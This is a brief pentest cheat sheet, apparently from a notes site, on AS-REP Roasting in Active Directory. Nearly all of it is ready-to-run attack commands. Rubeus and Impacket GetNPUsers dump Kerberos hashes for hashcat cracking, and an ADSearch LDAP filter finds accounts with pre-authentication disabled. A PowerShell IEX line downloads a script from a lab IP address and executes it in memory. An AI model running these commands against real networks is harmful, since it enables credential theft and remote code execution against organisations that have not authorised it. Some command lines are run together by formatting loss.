ASREP Roasting
All
Rubeus.exe asreproast /outfile:hashes.txt /format:hashcatSpecific
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountnameRubeus.exe asreproast /user:squid_svc /nowrapPowerShell
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.7/ASREPRoast.ps1')Get-ASREPHash -Username NGODFREY -verboseImpacket
impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/peteTooling
Last updated